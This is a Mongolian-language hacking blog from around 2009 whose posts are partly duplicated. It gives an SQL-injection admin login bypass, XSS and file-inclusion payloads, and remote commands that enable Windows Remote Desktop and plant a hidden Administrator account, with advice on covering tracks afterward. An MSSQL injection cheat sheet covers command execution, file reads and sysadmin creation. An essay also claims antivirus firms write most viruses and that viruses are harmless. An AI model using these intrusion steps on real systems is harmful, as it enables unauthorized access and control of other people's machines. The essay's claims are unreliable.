Saturday, January 19, 2013
Цаглашгүй их сүр хүч Агуу их суу заль дор бишрэн мөргөмү
Дундрашгүй Агуу их
Уудам Мөнх хөх
Хаязгааргүй тэнгэрийн
Цог заль Хүчний ивээлээр
Эрэлхэг зоригт Өвөг дээдсийн
Эрдэм Ухаан Гал голомт
Бүхнийг билэгдэн Сахих
Цаглашгүй нэртэй Хүү мэндлэвээ
***------ Хэмээн тунхаглав -----***
Tuesday, June 30, 2009
sain bna uu? анхан шатны мэдээлэл
зөвөлгөө
нээлттэй порт шалгагч NMAP
"--" sql нь энэ тэмдэгтээс хойшх камандийг биелүүлдэггүй.
'' or 1=1 энийг хараад sql мэддэг хүмүүс гадарлах байх
хэрэв зэ нууц үг тэнцэхгүй бол 1 нь 1 тэй тэнцүү юу гэсэн үг.
user name : Administrator
password: ' OR 1=1--
ингээд нэвтрэх хуудас дээр бичвэл admin эрхээр орох боломтой мэдээж ямар нэгэн filter тавиагүй үед;
XSS (Cross-Site Scripting)
"search.php?search=(<)script>window.location='http://xxx.mn/'(<)/script(>)". энийг бичхэд
"You searched for (<)script(>)window.location='http://xxx.mn/'(<)/script(>). There were no results found"
гэсэн мэдээлэл ийг хиих ба энэ нь http://xxx.mn гэсэн сайтийг дахин дахин дуудна(loop) гэсэн үг.
browser нь loop ийг хаадаг ба browser ийн тохиргоонд байдаг
RFI/LFI (Remote/Local File Include)
энэ жишээнд RFI "index.php?p=http://www.google.com/";
LFI "index.php?p=/etc/passwd";
гэх мэтийн өгөгдөл оруулж болох аж
нээлттэй порт шалгагч NMAP
- SQL Injection
- XSS (Cross-Site Scripting)
- RFI/LFI (Remote/Local File Include)
SQL Injection жишээ
"SELECT `ID` FROM `users` WHERE `username`='Administrator' AND `password='' OR 1=1--"--" sql нь энэ тэмдэгтээс хойшх камандийг биелүүлдэггүй.
'' or 1=1 энийг хараад sql мэддэг хүмүүс гадарлах байх
хэрэв зэ нууц үг тэнцэхгүй бол 1 нь 1 тэй тэнцүү юу гэсэн үг.
user name : Administrator
password: ' OR 1=1--
ингээд нэвтрэх хуудас дээр бичвэл admin эрхээр орох боломтой мэдээж ямар нэгэн filter тавиагүй үед;
XSS (Cross-Site Scripting)
Ихэнх хайлтийн хуудасны жишээ
= $_GET['search'];
// a real search engine would do some database stuff here
echo("You searched for $s. There were no results found");
?>"You searched for (<)script(>)window.location='http://xxx.mn/'(<)/script(>). There were no results found"
гэсэн мэдээлэл ийг хиих ба энэ нь http://xxx.mn гэсэн сайтийг дахин дахин дуудна(loop) гэсэн үг.
browser нь loop ийг хаадаг ба browser ийн тохиргоонд байдаг
RFI/LFI (Remote/Local File Include)
index.php ийн жишээ
= $_GET['p'];
if (isset($page)) {
include($page);
} else {
include("home.php");
}
?>
LFI "index.php?p=/etc/passwd";
гэх мэтийн өгөгдөл оруулж болох аж
Monday, June 22, 2009
Windows Remote Desktop attack
Windows Remote Desktop -ийг тохиргооний дос команд
Windows Remote Desktop -ийг шалгах:
@reg query "\\%1\HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections
Windows Remote Desktop -ийг идвэхтэй болгох
@reg add "\\%1\HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
Windows Remote Desktop -ийг идвэхгүй болгох
@reg add \\%1\HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 1 /f
энэ хандалтийг хийхэд sql injection ийг ашгилаж болно.
мөн дос хандалтаар идвэх жүүлж болно.
windows-т хэрэглэгч нэмэх:
net user guest {s2J234OPH}
renuser guest notguest
net localgroup guests notguest /delete
renuser Administrator admin
net user /add Administrator /active:no /passwordchg:no /passwordreq:yes
netuser Administrator /pwnexp:y
net user Administrator {s2J234OPH}
net localgroup users Administrator /delete
ингэснээр Админ эрхтэй хэрэглэгч нэмж болох ба
net localgroup "Remote Desktop Users" Administrator /add
за та ингээд админ эрхээр Remote PC-руу хандаж чадхаар боллоо шүүдээ.
аан нээрэй тийн хандалт хийж дууссаны дараа дээр байгаа Administrator -ийг устгаад admin -ийг administrator болгохоо мартваа.
Good luck
Windows Remote Desktop -ийг шалгах:
@reg query "\\%1\HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections
Windows Remote Desktop -ийг идвэхтэй болгох
@reg add "\\%1\HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
Windows Remote Desktop -ийг идвэхгүй болгох
@reg add \\%1\HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 1 /f
энэ хандалтийг хийхэд sql injection ийг ашгилаж болно.
мөн дос хандалтаар идвэх жүүлж болно.
windows-т хэрэглэгч нэмэх:
net user guest {s2J234OPH}
renuser guest notguest
net localgroup guests notguest /delete
renuser Administrator admin
net user /add Administrator /active:no /passwordchg:no /passwordreq:yes
netuser Administrator /pwnexp:y
net user Administrator {s2J234OPH}
net localgroup users Administrator /delete
ингэснээр Админ эрхтэй хэрэглэгч нэмж болох ба
net localgroup "Remote Desktop Users" Administrator /add
за та ингээд админ эрхээр Remote PC-руу хандаж чадхаар боллоо шүүдээ.
аан нээрэй тийн хандалт хийж дууссаны дараа дээр байгаа Administrator -ийг устгаад admin -ийг administrator болгохоо мартваа.
Good luck
MSSQL Injection хүсэлтийн хүснэгт
MSSQL Injection хийхэд хэрэглэг дэх хүсэлтүүд
| Хувиларийг хархад | SELECT @@version |
| одоо холбогдсон хэрэглэгчийг харах | SELECT user_name(); SELECT system_user; SELECT user; SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID |
| Хэрэглэгчдийг жагсааж харах | SELECT name FROM master..syslogins |
| Идвэхтэй датабэс | SELECT DB_NAME() |
| датабэс жагсаах | SELECT name FROM master..sysdatabases; SELECT DB_NAME(N); |
| AND үйлд | SELECT 6 & 2 -- returns 2 SELECT 6 & 1 -- returns 0 |
ASCII Value->Char | SELECT char(0x41) -- returns A |
| Char -> ASCII Value | SELECT ascii('A') - returns 65 |
| String залгах | SELECT 'A' + 'B' - returns AB |
If нөхцөл шалгах | IF (1=1) SELECT 1 ELSE SELECT 2 -- returns 1 |
| нөхцөл шалгах | SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END -- returns 1 |
| хүсэлийг тодорхой хугацаанд хүлээлгэх | WAITFOR DELAY '0:0:5' -- 5 секунд зогсоох |
| Дос комманд ажиллуулах | EXEC xp_cmdshell 'net user'; -- MSSQL 2005 анх суухдаа xp_cmdshell-ийг идвэхгүй болгосон байдаг. идвэхтэй болгхийн тулд : EXEC sp_configure 'show advanced options', 1; -- |
| Local файл хандалт | CREATE TABLE mydata (line varchar(8000)); BULK INSERT mydata FROM 'c:\boot.ini'; DROP TABLE mydata; |
| шинээр хэрэглэгч нэмэх | EXEC sp_addlogin 'user', 'pass'; -- |
| хэрэглэгч устгах | EXEC sp_droplogin 'user'; -- |
| системийн хэрэглэгч болгох | EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin; -- priv |
| үндсэн датабэс | northwind model msdb pubs tempdb |
Сайн байна уу?
WWW (World Wide Web) буюу 80 -аар портыг ашиглаж ихэвчлэн хийгддэг халдлага ууд:
1. xss
2. csrf
3. file upload
4. sql injection
5. code injection
6. xpath injection
7. remote file inclusion
8. local file inclusion ....гм байдаг аж.
Та хакер гэхээр л үзэн ядаж эсвэл бахархах сэтгэл төрдөг үү? Тэгвэл хакер гэдэг нэр томъёо чухам юуг хэлдэг вэ гэдгийг таньд сонордуулъя. Хүмүүс хакер гэхээр л нэг их эрдэм чадалтай компьютертэй холбоотой бүхний чаддаг хүн, эсвэл вирус зохиож компьютер эвддэг хүн гэсэн ойлголт авсан явдал их байдаг. Тэгвэл хакер гэдэг нь эдгээрийн алийг нь ч хэлэхгүй. Хакер гэдэг хүн вирус зохиох ч үгүй зохиох ч шаардлага байхгүй. Хакер хүнд бүх төрлийн мэдлэг байхгүй. Гол нь хакер гэдэг хүн нь компьютерийн програмчлал цаашлаад сүлжээний технологийн тал дээрээ л голчлон хөгжсөн хулгайч бас мэргэжилтэн хүн байдаг. Хакер нь ердөөсөө вирус хийдэггүй харин Троян хийдэг. Троян гэхээр таны санаанд Троё хотын модон морь санаанд орж байгаа биз. Тиймээ яг тийм үүрэгтэй бичил программ бичдэг.
Түүнийг сүлжээ и-мэйл зэргээр гарамгай дамжуулан дурын хэрэглэгчийн бүхий л мэдээг хулгайлж авах чадалтай байдаг. Харин яагаад мэргэжилтэн гэсэн бэ гэхлээр энэ маягаар үнэхээр сайн хулгай хийдэг хакеруудыг том том компани, корпорациуд ажилд аван өөрсдийн сүлжээ, мэдээллийн хамгаалалт хийлгэдэг. Тэр ч утгаараа үнэхээр сайн сүлжээний хамгаалагчид өмнө нь хакер байсан нь цөөнгүй. Харин таны компьютерт орж ирээд байдаг вирусууд бол ерөнхийдөө л зугаа юм. Вирусээр танд хор хөнөөл учруулна гэж бараг л байдаггүй зүйл харин таньд биш компьютерийн чинь программ хангамж гэх мэт энгийн өнгөц зүйлүүдийг л гэмтээдэг. Тэгээд ч өмнө дурдсанаар таны дата –г устгасан байлаа ч эргээгээд сэргээчихэж болно гэх мэт. Иймэрхүү төрлийн вирус хийдэг хүмүүс нь энгийн зугаацах гэсэн програмистууд байдагаас бус хакер огт биш юм. Тэгээд ч програмистуудын хийсэн вирус нь зугаатай зэвүүн хөгжилтэй байдаг. Харин ихэнх вирусыг үйлдвэрлэгч газар бол вирус устгагч хийдэг газар өөрөө байдаг гэхэд таньд хачин санагдаж байгаа биз. Энэ чинь бизнес шүү дээ вирус байхгүй бол антивирус байхгүй гэсэн үг. Харин цөөн тооны вирус нь программ үйлдвэрлэгчидээс байдаг. Тэр нь тэдний программыг гэмтээж дахин худалдан авахаас өөр аргагүйд хүргэхийн тулд юм. Харин үнэхээр хорлон сүйтгэгчдийг Кракер гэдэг эдгээр хүмүүс нь вирусыг тусгай зорилгын дагуу хийдэг, мөн программ хангамжуудыг, кино, дуу тоглоом зэргийг үнэгүй болгож тараадаг сонирхлынхоо дагуу нэгдэн ямар нэг газар луу дайрдаг ер нь л бол цагаандаа гарсан дээрэмчид гэмээр. Гэхдээ тэдгээр “ачтай” хүмүүсийн буянгаар бид нар олон олон программ хангамжууд, дуу тоглоомуудыг үнэгүй олоод авчихдаг. Харин хариуд нь тэд өөрсдийн хийсэн троян, вирус зэргээ бэлэг болгон өгөх нь энүүхэнд. Хариутай бол бариутай гэдэг хойно.
Харин дээрх хэдийн аль нь ч вэб мастер ч юмуу, компьютер графикч байж чадахгүй бөгөөд хүмүүс компьютер мэддэг гэхээр л бүгдийг нь чадна гэж ойлгоод байдаг. Харин бодит байдал дээр компьютерийн салбар маань дотроо маш олон салбар хэсгүүдтэй байдаг ба нэг хүн бүгдийг нь сурах мэдэхэд нас хүрэхгүй нь тодорхой бизээ.
1. xss
2. csrf
3. file upload
4. sql injection
5. code injection
6. xpath injection
7. remote file inclusion
8. local file inclusion ....гм байдаг аж.
Та хакер гэхээр л үзэн ядаж эсвэл бахархах сэтгэл төрдөг үү? Тэгвэл хакер гэдэг нэр томъёо чухам юуг хэлдэг вэ гэдгийг таньд сонордуулъя. Хүмүүс хакер гэхээр л нэг их эрдэм чадалтай компьютертэй холбоотой бүхний чаддаг хүн, эсвэл вирус зохиож компьютер эвддэг хүн гэсэн ойлголт авсан явдал их байдаг. Тэгвэл хакер гэдэг нь эдгээрийн алийг нь ч хэлэхгүй. Хакер гэдэг хүн вирус зохиох ч үгүй зохиох ч шаардлага байхгүй. Хакер хүнд бүх төрлийн мэдлэг байхгүй. Гол нь хакер гэдэг хүн нь компьютерийн програмчлал цаашлаад сүлжээний технологийн тал дээрээ л голчлон хөгжсөн хулгайч бас мэргэжилтэн хүн байдаг. Хакер нь ердөөсөө вирус хийдэггүй харин Троян хийдэг. Троян гэхээр таны санаанд Троё хотын модон морь санаанд орж байгаа биз. Тиймээ яг тийм үүрэгтэй бичил программ бичдэг.
Түүнийг сүлжээ и-мэйл зэргээр гарамгай дамжуулан дурын хэрэглэгчийн бүхий л мэдээг хулгайлж авах чадалтай байдаг. Харин яагаад мэргэжилтэн гэсэн бэ гэхлээр энэ маягаар үнэхээр сайн хулгай хийдэг хакеруудыг том том компани, корпорациуд ажилд аван өөрсдийн сүлжээ, мэдээллийн хамгаалалт хийлгэдэг. Тэр ч утгаараа үнэхээр сайн сүлжээний хамгаалагчид өмнө нь хакер байсан нь цөөнгүй. Харин таны компьютерт орж ирээд байдаг вирусууд бол ерөнхийдөө л зугаа юм. Вирусээр танд хор хөнөөл учруулна гэж бараг л байдаггүй зүйл харин таньд биш компьютерийн чинь программ хангамж гэх мэт энгийн өнгөц зүйлүүдийг л гэмтээдэг. Тэгээд ч өмнө дурдсанаар таны дата –г устгасан байлаа ч эргээгээд сэргээчихэж болно гэх мэт. Иймэрхүү төрлийн вирус хийдэг хүмүүс нь энгийн зугаацах гэсэн програмистууд байдагаас бус хакер огт биш юм. Тэгээд ч програмистуудын хийсэн вирус нь зугаатай зэвүүн хөгжилтэй байдаг. Харин ихэнх вирусыг үйлдвэрлэгч газар бол вирус устгагч хийдэг газар өөрөө байдаг гэхэд таньд хачин санагдаж байгаа биз. Энэ чинь бизнес шүү дээ вирус байхгүй бол антивирус байхгүй гэсэн үг. Харин цөөн тооны вирус нь программ үйлдвэрлэгчидээс байдаг. Тэр нь тэдний программыг гэмтээж дахин худалдан авахаас өөр аргагүйд хүргэхийн тулд юм. Харин үнэхээр хорлон сүйтгэгчдийг Кракер гэдэг эдгээр хүмүүс нь вирусыг тусгай зорилгын дагуу хийдэг, мөн программ хангамжуудыг, кино, дуу тоглоом зэргийг үнэгүй болгож тараадаг сонирхлынхоо дагуу нэгдэн ямар нэг газар луу дайрдаг ер нь л бол цагаандаа гарсан дээрэмчид гэмээр. Гэхдээ тэдгээр “ачтай” хүмүүсийн буянгаар бид нар олон олон программ хангамжууд, дуу тоглоомуудыг үнэгүй олоод авчихдаг. Харин хариуд нь тэд өөрсдийн хийсэн троян, вирус зэргээ бэлэг болгон өгөх нь энүүхэнд. Хариутай бол бариутай гэдэг хойно.
Харин дээрх хэдийн аль нь ч вэб мастер ч юмуу, компьютер графикч байж чадахгүй бөгөөд хүмүүс компьютер мэддэг гэхээр л бүгдийг нь чадна гэж ойлгоод байдаг. Харин бодит байдал дээр компьютерийн салбар маань дотроо маш олон салбар хэсгүүдтэй байдаг ба нэг хүн бүгдийг нь сурах мэдэхэд нас хүрэхгүй нь тодорхой бизээ.
Thursday, June 11, 2009
CRACKER гэж...
хэхэ орос ахнар байхад кракер хийх онц биш хэмээн инээдтэй санагдаж байж магад
харин надад бол харин орос ахийн crack-дсан soft хэргэлж байхаар өөрсдөө хэргэлдэг soft-оо crack-даад ашгилвал дээрл юм даа тиймээ. угаасаа бидний монгол оронд үнэтэй license - тэй soft ашгилдаг биш хэхэ
за ингээд нэгэн cracker гэгдэх хүн хэргэлдэг tool-уудийн хүргэж байна.
татах хуудас
hack- гэж нэг зүйл байдаг юм байна
хакэраа гэж ...
хүн бүхны сэтгэж чаддаггүй зүйлийг сэтгэдэг тун сонон хүмүүс шүү
би ойрноос энэ тал дээр маш их мэрийлттэй ажиллаж байгаа шүү
яахав эрлийн үзүүрт жаахан гэгээ гархаар нь жаахан урам авлаа
хакэр гэх хүн хэргэлдэг гэгдэх софтварийн жагсаалтийг орууллаа
1. Nmap
энийг бараг мэдэхгүй хүн гэж үгүй байх. гэхдээ мэдэхгүй хэн нэгэнд хэлхэд
энэ нь ReMote PC Port Scanner юм.
2. Nessus Remote Security Scanner
The remote security scanner software
3. John the Ripper
4. Nikto
5. SuperScan
6. p0f
7. Wireshark (Formely Ethereal)
8. Yersinia
9. Eraser
10. PuTTY
11. LCP
12. Cain and Abel
13. Kismet
14. NetStumbler
15. hping
хэхэ энэ тоолуудийг тайлбартай нь хамт оруулий гэж болдсон боловч google байхад би илүүц болвуу хэмээн мунхаг оюундаа тунгаасан болой
Subscribe to:
Posts (Atom)